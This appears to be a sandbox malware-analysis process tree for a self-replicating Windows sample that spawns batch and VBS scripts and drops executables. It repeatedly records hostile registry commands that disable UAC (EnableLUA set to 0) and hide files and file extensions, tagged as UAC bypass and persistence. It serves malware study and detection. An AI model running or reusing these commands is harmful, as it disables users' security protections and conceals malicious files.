- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qqYIIUgc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3736
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:548
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:4972
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:4084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:1268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DUMokckk.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1552
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sMsUQsgs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:900
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:844
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:4592
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:4212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:1968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\feAAIcII.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:1680
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:4772
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:2552
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2328
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\juQUMUMc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iQoAcQcE.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:3940
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:4808
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies visibility of file extensions in Explorer
      Modifies registry key
      PID:4204
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:2360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3088
  - - C:\ProgramData\MUgIsEoQ\HWowAAck.exe
      "C:\ProgramData\MUgIsEoQ\HWowAAck.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3968
  - - C:\Users\Admin\YGcEkYQk\jeUYkMEU.exe
      "C:\Users\Admin\YGcEkYQk\jeUYkMEU.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2248

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:1228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeMwYcUM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  - UAC bypass
  - Checks whether UAC is enabled
  - System policy modification
  PID:900
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:1692
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:3604
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1500
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:764
      - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
        
        C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
        6⤵
        
        PID:5036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pCYEQgcM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:3008
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:4092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kMAsUccM.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        6⤵
        
        PID:2400
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
        
        C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
        7⤵
        
        PID:4524
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:3428
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        6⤵
        
        PID:4232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:4772
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:548
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:4384
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - UAC bypass
    PID:3308

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:412

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3632
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2632

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:1280

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:456

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4328
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwsQsQQY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:380
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1236
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:1068
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:4348
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Suspicious behavior: EnumeratesProcesses
    PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zqkoUUEk.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:2556
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      Suspicious behavior: EnumeratesProcesses
      PID:1584
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\igookksA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:4408
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:2684
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3868
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:4836
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:3788
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      Modifies registry key
      PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:2404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:752

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VyMgQYcI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2120
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2552
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:684
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:2072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3576

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZSUcQIoY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4560
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:1068
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:4744
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:4408
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QmEgIUcU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4916
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:380
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4176

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:624

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1692
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - Modifies registry key
  PID:1308

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2200

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1772

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2348
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4524
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4588
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQUUUYkA.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1476
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tkYsgckk.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:4860
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:3148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:232
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:2828

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4824
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:3504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:3944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:808

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oyAoIksI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:1308

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:456
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:60

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4916

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:5108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3272

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:2132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1472

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2404

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1188

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1208

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3736

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4972
